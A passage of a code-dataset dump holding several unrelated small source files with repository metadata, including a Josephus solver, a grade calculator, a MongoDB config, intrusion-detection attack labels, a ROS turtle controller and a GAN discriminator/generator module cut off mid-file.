seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Josephus problem: n people stand in a circle, every m-th person is
# eliminated, and the process stops once only x people remain.
# (Original script hard-coded n=20, m=3, x=5; now parameterized.)


def josephus(n=20, m=3, x=5):
    """Return the elimination order for the Josephus circle.

    n: number of people, numbered 1..n.
    m: every m-th person (counting from the current position) is eliminated.
    x: stop as soon as only x people remain.
    Returns the list of eliminated person numbers, in elimination order.
    Raises ValueError for a non-positive count m or negative x.
    """
    if m < 1 or x < 0:
        raise ValueError("m must be >= 1 and x must be >= 0")
    people = list(range(1, n + 1))
    eliminated = []
    while len(people) > x:
        # Rotate m-1 people to the back of the queue; the m-th is out.
        for _ in range(m - 1):
            people.append(people.pop(0))
        eliminated.append(people.pop(0))
    return eliminated


if __name__ == '__main__':
    for number in josephus():
        # "number X was eliminated"
        print('{}号被淘汰了'.format(number))
| feiyu7348/python-Learning | 算法/约瑟夫环.py | 约瑟夫环.py | py | 283 | python | en | code | 0 | github-code | 90 |
import sys
input = sys.stdin.readline

# Competitive-programming solution (stdin/stdout).
# NOTE(review): the input format (N A B C D + board string S) and the
# "##"/"..." checks match AtCoder AGC 034 A "Kenus and Snuke": two tokens
# on squares A and B must reach C and D by jumping 1 or 2 squares right,
# never landing on a rock '#' — confirm against the original problem.
N, A, B, C, D = map(int, input().split())
S = list(input())[: -1]  # drop the trailing newline kept by readline()
tri = 0  # set to 1 if a "..." side-step window exists
# Two adjacent rocks anywhere on the travelled span block both tokens
# completely (a jump of at most 2 cannot clear "##").
for i in range(min(A, B) - 1, max(C, D) - 1):
    if S[i] == "#" and (S[i + 1] == "#"):
        print("No")
        exit(0)
# Look for three consecutive free squares between the tokens' far start
# and near goal, where one token can step aside to let the other pass.
for i in range(max(A, B) - 1, min(C, D)):
    if S[i] == "." and (S[i - 1] == ".") and (S[i + 1] == "."): tri = 1
if C <= D:
    # Goal order matches start order: no overtaking needed.
    print("Yes")
else:
    # Overtaking required: only possible with a "..." window.
    if tri: print("Yes")
    else: print("No")
| Aasthaengg/IBMdataset | Python_codes/p03017/s915018796.py | s915018796.py | py | 413 | python | en | code | 0 | github-code | 90 |
25743122284 | from f_utils import u_tester
from model.point import Point
from model.grid_blocks import GridBlocks
from logic import u_points
class TestPoints:
    """Test runner for the u_points logic module.

    Instantiating the class executes every tester and reports the
    results through u_tester.
    """

    def __init__(self):
        u_tester.print_start(__file__)
        TestPoints.__tester_nearest()
        TestPoints.__tester_distances()
        TestPoints.__tester_distances_to()
        TestPoints.__tester_distance_rows()
        TestPoints.__tester_distance_cols()
        u_tester.print_finish(__file__)

    @staticmethod
    def __tester_nearest():
        # nearest() should map each candidate point to its distance.
        origin = Point(0, 0)
        candidates = {Point(2, 0), Point(0, 1), Point(1, 2)}
        expected = {Point(0, 1): 1, Point(2, 0): 2, Point(1, 2): 3}
        actual = u_points.nearest(origin, candidates)
        u_tester.run(actual == expected)

    @staticmethod
    def __tester_distances_to():
        # Aggregate distance from one point to a list of points.
        origin = Point(0, 0)
        targets = [Point(0, 1), Point(1, 1), Point(2, 2), Point(2, 2)]
        actual = u_points.distances_to(origin, targets)
        u_tester.run(actual == 2)

    @staticmethod
    def __tester_distances():
        # Aggregate pairwise distance over a list of points.
        cloud = [Point(0, 0), Point(1, 1), Point(2, 2), Point(1, 2)]
        actual = u_points.distances(cloud)
        u_tester.run(actual == 3.25)

    @staticmethod
    def __tester_distance_rows():
        # Row distance for single points, then growing point groups.
        group_a = [Point(3, 3)]
        group_b = [Point(5, 5)]
        single = u_points.distance_rows(group_a, group_b) == 2
        group_b = [Point(5, 5), Point(7, 7)]
        multi_b = u_points.distance_rows(group_a, group_b) == 3
        group_a = [Point(3, 3), Point(4, 4)]
        multi_both = u_points.distance_rows(group_a, group_b) == 2.5
        u_tester.run(single, multi_b, multi_both)

    @staticmethod
    def __tester_distance_cols():
        # Column distance for single points, then growing point groups.
        group_a = [Point(3, 3)]
        group_b = [Point(5, 4)]
        single = u_points.distance_cols(group_a, group_b) == 1
        group_b = [Point(5, 5), Point(7, 6)]
        multi_b = u_points.distance_cols(group_a, group_b) == 2.5
        group_a = [Point(3, 3), Point(4, 3)]
        multi_both = u_points.distance_cols(group_a, group_b) == 2.5
        u_tester.run(single, multi_b, multi_both)
| valdas1966/kg | logic/testers/t_points.py | t_points.py | py | 2,477 | python | en | code | 0 | github-code | 90 |
def status(marks):
    """Return "p" (pass) when marks is at least 35, otherwise "f" (fail)."""
    return "p" if marks >= 35 else "f"
def find_grade(marks):
    """Return the letter grade for a marks value.

    Bands: >=75 "a+", >=60 "a", >=50 "b", >=35 "c", below 35 "f"
    (35 is the pass mark, matching status()).
    The original nested else called status() only to re-derive the
    marks < 35 test; the guard-clause chain below is equivalent.
    """
    if marks >= 75:
        return "a+"
    if marks >= 60:
        return "a"
    if marks >= 50:
        return "b"
    if marks >= 35:
        return "c"
    return "f"
def bl_count(s1, s2, s3, s4, s5, s6):
    """Return the number of failed subjects (backlogs).

    A subject is failed when its marks are below 35 — the same pass
    mark used by status(). Replaces six copy-pasted if-blocks with a
    single counting expression.
    """
    return sum(1 for marks in (s1, s2, s3, s4, s5, s6) if marks < 35)
def tot_score(s1, s2, s3, s4, s5, s6):
    """Return the total of the six subject marks."""
    return sum((s1, s2, s3, s4, s5, s6))
def per(total):
    """Return the percentage (floor-divided average over six subjects)."""
    average, _remainder = divmod(total, 6)
    return average
def valid(s1, s2, s3, s4, s5, s6):
    """Return True when every mark lies in the inclusive range 0..100.

    Replaces the original six-clause boolean chain with a single all()
    over the marks; behavior is identical.
    """
    return all(0 <= marks <= 100 for marks in (s1, s2, s3, s4, s5, s6))
# Read six subject marks from stdin and print a per-subject report,
# backlog count, total, percentage and an overall grade.
s1, s2, s3, s4, s5, s6 = map(int, input().split())
if valid(s1, s2, s3, s4, s5, s6):
    # One line per subject: name, marks, max marks, pass/fail, grade.
    print("english", s1, 100, status(s1), find_grade(s1))
    print("telugu", s2, 100, status(s2), find_grade(s2))
    print("hindi", s3, 100, status(s3), find_grade(s3))
    print("maths", s4, 100, status(s4), find_grade(s4))
    print("science", s5, 100, status(s5), find_grade(s5))
    print("social", s6, 100, status(s6), find_grade(s6))
    total = tot_score(s1, s2, s3, s4, s5, s6)
    # Keep the result in its own name: the original `per = per(total)`
    # rebound (shadowed) the per() function with its own return value.
    percentage = per(total)
    bl = bl_count(s1, s2, s3, s4, s5, s6)
    print("Backlog count", bl)
    print("Total", total)
    print("Percentage", percentage)
    if bl == 0:
        print(find_grade(percentage))
    else:
        print("Fail")
else:
    print("Invalid Scores")
| GondiJhansi/Python_K3 | Stud_Stat_Grade.py | Stud_Stat_Grade.py | py | 1,706 | python | en | code | 0 | github-code | 90 |
import os
import dotenv
from pymongo import MongoClient

# Populate the process environment from a local .env file, then open a
# MongoDB connection and expose the "politicos" collection.
dotenv.load_dotenv()
dburl = os.getenv("URL")
#password= os.getenv ("pass")
# NOTE(review): this prints the full connection string (may include
# credentials) — consider removing before production use.
print(dburl)
if not dburl:
    # Error text is Spanish for "you have no mongodb url".
    raise ValueError("no tienes url mongodb")
client = MongoClient(dburl)
# get_database() with no name returns the default database from the URL.
db = client.get_database()
collection = db["politicos"]
#client = pymongo.MongoClient("mongodb+srv://asiokfd:<" + pass + ">@cluster0.zlghr.mongodb.net/myFirstDatabase?retryWrites=true&w=majority")
#db = client.test
#db = client.test | asiokfd/Proyecto4 | config/configuration.py | configuration.py | py | 470 | python | en | code | 0 | github-code | 90 |
# Mapping from attack category to the set of individual attack labels
# belonging to it. Label names look like the KDD-Cup-99 / NSL-KDD
# intrusion-detection datasets — verify against the dataset loader.
# Categories: normal traffic, dos (denial of service), u2r (user to
# root), r2l (remote to local) and probe (network scanning).
attack_categories = {
    "normal": {
        "normal"
    },
    "dos": {
        "mailbomb",
        "back",
        "land",
        "neptune",
        "pod",
        "smurf",
        "teardrop",
        "apache2",
        "udpstorm",
        "processtable"
    },
    "u2r": {
        "buffer_overflow",
        "loadmodule",
        "perl",
        "rootkit",
        "sqlattack",
        "xterm",
        "httptunnel",
        "ps"
    },
    "r2l": {
        "guess_passwd",
        "ftp_write",
        "imap",
        "phf",
        "multihop",
        "warezmaster",
        "warezclient",
        "spy",
        "xlock",
        "xsnoop",
        "snmpguess",
        "snmpgetattack",
        "sendmail",
        "named",
        "worm"
    },
    "probe": {
        "satan",
        "ipsweep",
        "nmap",
        "portsweep",
        "mscan",
        "saint"
    }
}
| abriehalgryn/IntrusionDetection-With-SVM-and-PCA | attack_categories.py | attack_categories.py | py | 841 | python | en | code | 0 | github-code | 90 |
import os
import sys

# Static configuration for the PyBoolNet tool wrapper.
multivalued = False
input_format = 'bnet'
# Release archive from which the bundled PyBoolNet source is obtained.
url = 'https://github.com/hklarner/PyBoolNet/releases/download/v2.1/PyBoolNet-2.1_linux64.tar.gz'
# Make the unpacked PyBoolNet source (next to this file) importable.
folder = os.path.abspath(os.path.split(__file__)[0])
pypath = os.path.join(folder, 'source', 'PyBoolNet-2.1')
sys.path.insert(0,pypath)
#print(pypath)
# Probe whether the package is actually available; callers can check
# is_installed instead of handling the ImportError themselves.
try:
    import PyBoolNet
    is_installed = True
except:
    is_installed = False
| colomoto/colomoto-benchmarks | tools/PyBoolNet/config.py | config.py | py | 401 | python | en | code | 1 | github-code | 90 |
73820408617 | class Solution:
def numPermsDISequence(self, S: str) -> int:
size = len(S) + 1
dp = [[0] * size for _ in range(size)]
dp[0][0] = 1
for i in range(1, size):
for j in range(i + 1):
if S[i - 1] == 'D':
for k in range(j, i):
dp[i][j] += dp[i - 1][k]
elif S[i - 1] == 'I':
for k in range(j):
dp[i][j] += dp[i - 1][k]
return sum(dp[-1]) % (10 ** 9 + 7)
| HarrrrryLi/LeetCode | 903. Valid Permutations for DI Sequence/Python 3/solution.py | solution.py | py | 523 | python | en | code | 0 | github-code | 90 |
28142849770 | #!/usr/bin/env python3
import rospy
from sensor_msgs.msg import LaserScan
from std_msgs.msg import String
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
import math
from math import cos, sin
# Closest laser-scan point, in the scanner frame (metres); updated by
# scan_callback.
LASERSCAN_X = 0.0
LASERSCAN_Y = 0.0
# Latest turtle pose from /turtle1/pose; updated by pose_callback.
CURRENT_POSE_X = 0.0
CURRENT_POSE_Y = 0.0
CURRENT_POSE_THETA = 0.0
def compute_closest_point(ranges, angle_min, angle_increment):
    """Return (x, y) of the closest non-NaN reading, or None if there is none.

    x = r*cos(theta), y = r*sin(theta) in the scanner frame, where
    theta = angle_min + index * angle_increment.
    Ties on range resolve to the first (lowest-index) reading, matching
    the original list.index(min(...)) behavior.
    """
    finite = [(r, idx) for idx, r in enumerate(ranges) if not math.isnan(r)]
    if not finite:
        return None
    closest_range, min_index = min(finite)
    angle = angle_min + min_index * angle_increment
    return closest_range * cos(angle), closest_range * sin(angle)


def scan_callback(data):
    """LaserScan callback: cache the closest scan point in module globals."""
    global LASERSCAN_X, LASERSCAN_Y
    point = compute_closest_point(data.ranges, data.angle_min, data.angle_increment)
    # Keep the previous closest point when the scan has no valid reading;
    # the original code raised ValueError (min of empty) on an all-NaN scan.
    if point is not None:
        LASERSCAN_X, LASERSCAN_Y = point
def pose_callback(data):
    """Pose callback: cache the turtle's current pose in module globals."""
    global CURRENT_POSE_X, CURRENT_POSE_Y, CURRENT_POSE_THETA
    CURRENT_POSE_X, CURRENT_POSE_Y, CURRENT_POSE_THETA = (
        data.x,
        data.y,
        data.theta,
    )
def publish_closest_point(pub):
    """Steer the turtle towards the cached closest laser-scan point.

    Reads the module globals filled by scan_callback/pose_callback,
    computes linear velocity commands and publishes them as a Twist on
    *pub* (the /turtle1/cmd_vel publisher). Called at 10 Hz by listener().
    """
    global LASERSCAN_X, LASERSCAN_Y, CURRENT_POSE_X, CURRENT_POSE_Y, CURRENT_POSE_THETA
    # The center of the turtle seems to be 5.5, 5.5
    current_pose_x = CURRENT_POSE_X - 5.5
    current_pose_y = CURRENT_POSE_Y - 5.5
    # The laserscan starts at 0.5 m and should just be used for 0.2m,
    # so that the center is at 0.55 m.
    # The y component can be left as it is.
    laserscan_x = (LASERSCAN_X-0.55)
    laserscan_y = (LASERSCAN_Y)
    # Adjust x and y value and if the closest point is to far just stopt the turtle
    if laserscan_x<-0.05 or laserscan_x>0.05:
        control_input_x=0.0
        control_input_y=0.0
        rospy.loginfo("Stopped!")
    else:
        #Make values extremer to need less movement
        laserscan_x = laserscan_x*100
        laserscan_y = laserscan_y*50
        # Constants for PID controller
        KP = 0.5 # Proportional gain
        KI = 0.1 # Integral gain
        KD = 0.2 # Derivative gain
        # Initialize variables
        # NOTE(review): these are locals, re-initialised to zero on every
        # call, so the integral never accumulates and the derivative is
        # always (error - 0). The "PID" therefore degenerates to pure
        # P-control with effective gain KP + KI + KD; persist these values
        # across calls (e.g. module globals) to get a real PID.
        previous_error_x = 0
        previous_error_y = 0
        integral_x = 0
        integral_y = 0
        # Calculate the error - x and y are turned because the are defined in that way
        error_x = laserscan_y - current_pose_x
        error_y = -laserscan_x - current_pose_y
        # Calculate the PID components for each axis
        proportional_x = KP * error_x
        integral_x += KI * error_x
        derivative_x = KD * (error_x - previous_error_x)
        proportional_y = KP * error_y
        integral_y += KI * error_y
        derivative_y = KD * (error_y - previous_error_y)
        # Calculate the control inputs for each axis
        control_input_x = proportional_x + integral_x + derivative_x
        control_input_y = proportional_y + integral_y + derivative_y
        # Update the previous errors (no effect across calls, see note above)
        previous_error_x = error_x
        previous_error_y = error_y
    # Create and publish the Twist message
    twist = Twist()
    twist.linear.x = control_input_x
    twist.linear.y = control_input_y
    twist.angular.z = 0.0 # Assuming no angular control needed
    pub.publish(twist)
    # Print Poses to log
    rospy.loginfo("Current pose (x, y): ({}, {})".format(current_pose_x, current_pose_y))
    rospy.loginfo("Wished pose (x, y): ({}, {})".format(laserscan_x, laserscan_y))
    # Print Speed to log
    rospy.loginfo("Current speed (x, y): ({}, {})".format(control_input_x, control_input_y))
    #LASERSCAN_X = 0.0
    #LASERSCAN_Y = 0.0
def listener():
    """Initialise the ROS node, wire up subscribers/publisher and run
    the 10 Hz control loop until shutdown."""
    rospy.init_node('scan_subscriber', anonymous=True)
    rospy.Subscriber('/scan', LaserScan, scan_callback)
    rospy.Subscriber('/turtle1/pose', Pose,pose_callback)
    # Initialize publisher
    pub = rospy.Publisher('/turtle1/cmd_vel', Twist, queue_size=10)
    rate = rospy.Rate(10) # 10 Hz
    while not rospy.is_shutdown():
        publish_closest_point(pub)
        rate.sleep()


if __name__ == '__main__':
    listener()
| mikejosef10/conturtle | kinect_writter/scripts/laserscan_to_cmdVel.py | laserscan_to_cmdVel.py | py | 4,187 | python | en | code | 0 | github-code | 90 |
35374126596 | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import os
import sys
import math
from collections import OrderedDict
from torch.autograd import Variable
import util.util as util
from .base_model import BaseModel
from . import networks
from .flownet2_pytorch.networks.resample2d_package.resample2d import Resample2d
########################
#### Discriminators ####
########################
class Head2HeadModelD(BaseModel):
    """Bundle of head2head discriminators and their losses.

    Holds the conditional image discriminator (netD), optional mouth and
    eyes region discriminators (netDm / netDe), and one dynamics
    (temporal) discriminator per temporal scale (netD_T0, netD_T1, ...),
    together with their loss criteria and Adam optimizers.
    """
    def name(self):
        return 'Head2HeadModelD'

    def initialize(self, opt):
        """Build every discriminator, loss function and optimizer from opt."""
        BaseModel.initialize(self, opt)
        self.gpu_ids = opt.gpu_ids
        self.n_frames_D = opt.n_frames_D
        self.output_nc = opt.output_nc
        self.input_nc = opt.input_nc
        # Flow-based warping layer, used by the warp loss in forward().
        self.resample = Resample2d()
        # Image discriminator: conditioned on (input, output) channel pairs.
        netD_input_nc = self.input_nc + opt.output_nc
        self.netD = networks.define_D(netD_input_nc, opt.ndf, opt.n_layers_D, opt.norm,
                                      opt.num_D, not opt.no_ganFeat, gpu_ids=self.gpu_ids, opt=opt)
        # Mouth, Eyes discriminator (same architecture, region crops as input)
        if not opt.no_mouth_D:
            self.netDm = networks.define_D(netD_input_nc, opt.ndf, opt.n_layers_D, opt.norm,
                                           opt.num_D, not opt.no_ganFeat, gpu_ids=self.gpu_ids, opt=opt)
        if opt.use_eyes_D:
            self.netDe = networks.define_D(netD_input_nc, opt.ndf, opt.n_layers_D, opt.norm,
                                           opt.num_D, not opt.no_ganFeat, gpu_ids=self.gpu_ids, opt=opt)
        # Dynamics discriminator: sees n_frames_D frames plus the
        # (n_frames_D - 1) two-channel flows between them; one per scale.
        netD_input_nc = opt.output_nc * opt.n_frames_D + 2 * (opt.n_frames_D-1)
        for s in range(opt.n_scales_temporal):
            setattr(self, 'netD_T'+str(s), networks.define_D(netD_input_nc, opt.ndf, opt.n_layers_D, opt.norm,
                                                             opt.num_D, not opt.no_ganFeat, gpu_ids=self.gpu_ids, opt=opt))
        # load networks (resume or fine-tune from a saved checkpoint)
        if (opt.continue_train or opt.load_pretrain):
            self.load_network(self.netD, 'D', opt.which_epoch, opt.load_pretrain)
            if not opt.no_mouth_D:
                self.load_network(self.netDm, 'Dm', opt.which_epoch, opt.load_pretrain)
            if opt.use_eyes_D:
                self.load_network(self.netDe, 'De', opt.which_epoch, opt.load_pretrain)
            for s in range(opt.n_scales_temporal):
                self.load_network(getattr(self, 'netD_T'+str(s)), 'D_T'+str(s), opt.which_epoch, opt.load_pretrain)
            print('---------- Discriminators loaded -------------')
        else:
            print('---------- Discriminators initialized -------------')
        # set loss functions and optimizers
        self.old_lr = opt.lr
        # define loss functions
        self.criterionGAN = networks.GANLoss(opt.gan_mode, tensor=self.Tensor)
        self.criterionWarp = networks.MaskedL1Loss()
        self.criterionFeat = torch.nn.L1Loss()
        if not opt.no_vgg:
            self.criterionVGG = networks.VGGLoss(self.gpu_ids[0])
        # Names in these lists match the order of the loss tensors
        # returned by forward() (spatial) and the temporal branch.
        self.loss_names = ['G_VGG', 'G_GAN', 'G_GAN_Feat', 'D_real', 'D_fake', 'G_Warp']
        self.loss_names_T = ['G_T_GAN', 'G_T_GAN_Feat', 'D_T_real', 'D_T_fake']
        if not opt.no_mouth_D:
            self.loss_names += ['Gm_GAN', 'Gm_GAN_Feat', 'Dm_real', 'Dm_fake']
        if opt.use_eyes_D:
            self.loss_names += ['Ge_GAN', 'Ge_GAN_Feat', 'De_real', 'De_fake']
        beta1, beta2 = opt.beta1, 0.999
        lr = opt.lr
        # initialize optimizers: one shared Adam for the spatial
        # discriminators, one per temporal scale.
        params = list(self.netD.parameters())
        if not opt.no_mouth_D:
            params += list(self.netDm.parameters())
        if opt.use_eyes_D:
            params += list(self.netDe.parameters())
        self.optimizer_D = torch.optim.Adam(params, lr=lr, betas=(beta1, beta2))
        for s in range(opt.n_scales_temporal):
            params = list(getattr(self, 'netD_T'+str(s)).parameters())
            optimizer_D_T = torch.optim.Adam(params, lr=lr, betas=(beta1, beta2))
            setattr(self, 'optimizer_D_T'+str(s), optimizer_D_T)

    def compute_D_losses(self, netD, real_A, real_B, fake_B):
        """Return (D_real, D_fake, G_GAN, G_GAN_Feat) losses for one
        conditional discriminator on (condition, image) pairs."""
        # Input: discriminator sees the condition concatenated with the image.
        real_AB = torch.cat((real_A, real_B), dim=1)
        fake_AB = torch.cat((real_A, fake_B), dim=1)
        # D losses (fake detached so G gets no gradient from the D update)
        pred_real = netD.forward(real_AB)
        pred_fake = netD.forward(fake_AB.detach())
        loss_D_real = self.criterionGAN(pred_real, True, isG=False)
        loss_D_fake = self.criterionGAN(pred_fake, False, isG=False)
        # G losses (second forward pass keeps the graph to G)
        pred_fake = netD.forward(fake_AB)
        loss_G_GAN = self.criterionGAN(pred_fake, True, isG=True)
        loss_G_GAN_Feat = self.FM_loss(pred_real, pred_fake)
        return loss_D_real, loss_D_fake, loss_G_GAN, loss_G_GAN_Feat

    def compute_D_T_losses(self, real_B, fake_B, flow_ref, conf_ref, D_T_scale):
        """Return (D_T_real, D_T_fake, G_T_GAN, G_T_GAN_Feat) losses for
        the dynamics discriminator at temporal scale D_T_scale."""
        # Input: stack n_frames_D frames channel-wise, optionally with
        # the reference flows between them.
        netD_T = getattr(self, 'netD_T'+str(D_T_scale))
        real_B = real_B.view(-1, self.output_nc * self.n_frames_D, self.height, self.width)
        fake_B = fake_B.view(-1, self.output_nc * self.n_frames_D, self.height, self.width)
        if flow_ref is not None:
            flow_ref = flow_ref.view(-1, 2 * (self.n_frames_D-1), self.height, self.width)
            real_B = torch.cat([real_B, flow_ref], dim=1)
            fake_B = torch.cat([fake_B, flow_ref], dim=1)
        # D_T losses
        pred_real = netD_T.forward(real_B)
        pred_fake = netD_T.forward(fake_B.detach())
        loss_D_T_real = self.criterionGAN(pred_real, True, isG=False)
        loss_D_T_fake = self.criterionGAN(pred_fake, False, isG=False)
        # G losses
        pred_fake = netD_T.forward(fake_B)
        loss_G_T_GAN = self.criterionGAN(pred_fake, True, isG=True)
        loss_G_T_GAN_Feat = self.FM_loss(pred_real, pred_fake)
        return loss_D_T_real, loss_D_T_fake, loss_G_T_GAN, loss_G_T_GAN_Feat

    def FM_loss(self, pred_real, pred_fake):
        """Feature-matching loss: L1 between intermediate discriminator
        features of real vs fake, averaged over scales and layers.
        Returns a zero tensor when feature matching is disabled."""
        if not self.opt.no_ganFeat:
            loss_G_GAN_Feat = 0
            feat_weights = 4.0 / (self.opt.n_layers_D + 1)
            D_weights = 1.0 / self.opt.num_D
            for i in range(min(len(pred_fake), self.opt.num_D)):
                # last entry of each scale is the final prediction, skip it
                for j in range(len(pred_fake[i])-1):
                    loss_G_GAN_Feat += D_weights * feat_weights * \
                        self.criterionFeat(pred_fake[i][j], pred_real[i][j].detach()) * self.opt.lambda_feat
        else:
            loss_G_GAN_Feat = torch.zeros(1, 1).cuda()
        return loss_G_GAN_Feat

    def forward(self, D_T_scale, tensors_list, mouth_centers=None, eyes_centers=None):
        """Compute all losses for one discriminator branch.

        D_T_scale == 0 selects the spatial branch (image + optional
        mouth/eyes Ds); D_T_scale > 0 selects the dynamics discriminator
        at scale D_T_scale - 1. tensors_list contents differ per branch
        (see the unpacking below). Returns a list of loss tensors, each
        unsqueezed to shape (1, ...) for multi-GPU gathering; order
        matches self.loss_names / self.loss_names_T.
        """
        is_temporal_D = D_T_scale != 0
        lambda_feat = self.opt.lambda_feat
        lambda_warp = self.opt.lambda_warp
        tD = self.opt.n_frames_D  # unused here, kept for reference
        if is_temporal_D:
            # Losses from Dynamics Discriminators
            real_B, fake_B, flow_ref, conf_ref = tensors_list
            _, _, _, self.height, self.width = real_B.size()
            # flow magnitudes are scaled down by 20 before entering D_T
            loss_D_T_real, loss_D_T_fake, loss_G_T_GAN, loss_G_T_GAN_Feat = self.compute_D_T_losses(real_B, fake_B, flow_ref/20, conf_ref, D_T_scale-1)
            loss_list = [loss_G_T_GAN, loss_G_T_GAN_Feat, loss_D_T_real, loss_D_T_fake]
            loss_list = [loss.unsqueeze(0) for loss in loss_list]
            return loss_list
        else:
            real_B, fake_B, real_A, real_B_prev, fake_B_prev, flow_ref, conf_ref = tensors_list
            _, _, self.height, self.width = real_B.size()
            #################### Losses ####################
            # VGG loss (perceptual); zero tensor when disabled
            loss_G_VGG = (self.criterionVGG(fake_B, real_B) * lambda_feat) if not self.opt.no_vgg else torch.zeros(1, 1).cuda()
            # GAN loss for Generator
            loss_D_real, loss_D_fake, loss_G_GAN, loss_G_GAN_Feat = self.compute_D_losses(self.netD, real_A, real_B, fake_B)
            # Warp loss: fake frame should match the previous fake frame
            # warped by the reference flow, masked by its confidence.
            fake_B_warp_ref = self.resample(fake_B_prev, flow_ref)
            loss_G_Warp = self.criterionWarp(fake_B, fake_B_warp_ref.detach(), conf_ref) * lambda_warp
            loss_list = [loss_G_VGG, loss_G_GAN, loss_G_GAN_Feat, loss_D_real, loss_D_fake, loss_G_Warp]
            if not self.opt.no_mouth_D:
                # Extract mouth region around the center.
                real_A_mouth, real_B_mouth, fake_B_mouth = util.get_ROI([real_A, real_B, fake_B], mouth_centers, self.opt)
                # Losses for mouth discriminator
                loss_Dm_real, loss_Dm_fake, loss_Gm_GAN, loss_Gm_GAN_Feat = self.compute_D_losses(self.netDm, real_A_mouth, real_B_mouth, fake_B_mouth)
                mouth_weight = 1
                loss_Gm_GAN *= mouth_weight
                loss_Gm_GAN_Feat *= mouth_weight
                loss_list += [loss_Gm_GAN, loss_Gm_GAN_Feat, loss_Dm_real, loss_Dm_fake]
            if self.opt.use_eyes_D:
                # Extract eyes region around the center.
                real_A_eyes, real_B_eyes, fake_B_eyes = util.get_ROI([real_A, real_B, fake_B], eyes_centers, self.opt)
                # Losses for eyes discriminator
                loss_De_real, loss_De_fake, loss_Ge_GAN, loss_Ge_GAN_Feat = self.compute_D_losses(self.netDe, real_A_eyes, real_B_eyes, fake_B_eyes)
                eyes_weight = 1
                loss_Ge_GAN *= eyes_weight
                loss_Ge_GAN_Feat *= eyes_weight
                loss_list += [loss_Ge_GAN, loss_Ge_GAN_Feat, loss_De_real, loss_De_fake]
            loss_list = [loss.unsqueeze(0) for loss in loss_list]
            return loss_list

    def save(self, label):
        """Save every discriminator checkpoint under the given label."""
        self.save_network(self.netD, 'D', label, self.gpu_ids)
        if not self.opt.no_mouth_D:
            self.save_network(self.netDm, 'Dm', label, self.gpu_ids)
        if self.opt.use_eyes_D:
            self.save_network(self.netDe, 'De', label, self.gpu_ids)
        for s in range(self.opt.n_scales_temporal):
            self.save_network(getattr(self, 'netD_T'+str(s)), 'D_T'+str(s), label, self.gpu_ids)

    def update_learning_rate(self, epoch):
        """Linearly decay the learning rate over the last niter_decay epochs."""
        lr = self.opt.lr * (1 - (epoch - self.opt.niter) / self.opt.niter_decay)
        for param_group in self.optimizer_D.param_groups:
            param_group['lr'] = lr
        print('update learning rate: %f -> %f' % (self.old_lr, lr))
        self.old_lr = lr
##########################
#### Generator model ####
##########################
class Head2HeadModelG(BaseModel):
    """head2head generator wrapper: builds netG, and runs the
    autoregressive per-frame generation for training and inference."""
    def name(self):
        return 'Head2HeadModelG'

    def initialize(self, opt):
        """Build the generator (and its optimizer when training)."""
        BaseModel.initialize(self, opt)
        self.isTrain = opt.isTrain
        self.n_frames_G = opt.n_frames_G
        input_nc = opt.input_nc
        # G consumes n_frames_G conditioning frames plus the previously
        # generated n_frames_G - 1 output frames, all stacked channel-wise.
        netG_input_nc = input_nc * self.n_frames_G
        prev_output_nc = (self.n_frames_G - 1) * opt.output_nc
        self.netG = networks.define_G(netG_input_nc, opt.output_nc, prev_output_nc, opt.ngf, opt.n_downsample_G, opt.norm, self.gpu_ids, opt)
        # load networks
        if not self.isTrain or opt.continue_train or opt.load_pretrain:
            self.load_network(self.netG, 'G', opt.which_epoch, opt.load_pretrain)
            print('---------- Generator loaded -------------')
        else:
            print('---------- Generator initialized -------------')
        # Optimizer for G
        if self.isTrain:
            self.old_lr = opt.lr
            # detach the generated-frame chain every n_frames_backpropagate
            # steps; cap the frames generated per pass by GPU memory.
            self.n_frames_backpropagate = self.opt.n_frames_backpropagate
            self.n_frames_load = min(self.opt.max_frames_per_gpu, self.opt.n_frames_total)
            # initialize optimizer G
            params = list(self.netG.parameters())
            beta1, beta2 = opt.beta1, 0.999
            lr = opt.lr
            self.optimizer_G = torch.optim.Adam(params, lr=lr, betas=(beta1, beta2))

    def encode_input(self, input_map, real_image):
        """Move inputs to GPU and record batch size / spatial dims.

        input_map is assumed to be (batch, time, channels, height, width)
        — the size() unpacking below relies on that layout.
        """
        size = input_map.size()
        self.bs, _, self.height, self.width = size[0], size[1], size[3], size[4]
        input_map = input_map.data.cuda()
        if real_image is not None:
            real_image = Variable(real_image.data.cuda())
        return input_map, real_image

    def forward(self, input_A, input_B, fake_B_prev):
        """Training forward: autoregressively generate n_frames_load frames.

        Returns (fake_B, trailing real_A, trailing real_B, detached
        fake_B_prev tail to seed the next call).
        """
        real_A, real_B = self.encode_input(input_A, input_B)
        gpu_id = real_A.get_device()
        is_first_frame = fake_B_prev is None
        if is_first_frame:
            # Seed the previous-frames buffer: zeros, or the first real frames.
            if self.opt.no_first_img:
                fake_B_prev = Variable(self.Tensor(self.bs, self.n_frames_G-1, self.opt.output_nc, self.height, self.width).zero_())
            else:
                fake_B_prev = real_B[:,:self.n_frames_G-1,...]
        ### generate frames sequentially
        for t in range(self.n_frames_load):
            _, _, _, h, w = real_A.size()
            real_A_reshaped = real_A[:, t:t+self.n_frames_G,...].view(self.bs, -1, h, w).cuda(gpu_id)
            fake_B_prevs = fake_B_prev[:, t:t+self.n_frames_G-1,...].cuda(gpu_id)
            # periodically cut the backprop chain through generated frames
            if (t % self.n_frames_backpropagate) == 0:
                fake_B_prevs = fake_B_prevs.detach()
            fake_B_prevs_reshaped = fake_B_prevs.view(self.bs, -1, h, w)
            fake_B = self.netG.forward(real_A_reshaped, fake_B_prevs_reshaped, self.opt.isTrain)
            # append the new frame so it conditions the next step
            fake_B_prev = self.concatenate_tensors([fake_B_prev, fake_B.unsqueeze(1).cuda(gpu_id)], dim=1)
        fake_B = fake_B_prev[:, self.n_frames_G-1:]
        fake_B_prev = fake_B_prev[:, -self.n_frames_G+1:].detach()
        return fake_B, real_A[:,self.n_frames_G-1:], real_B[:,self.n_frames_G-2:], fake_B_prev

    def inference(self, input_A, input_B):
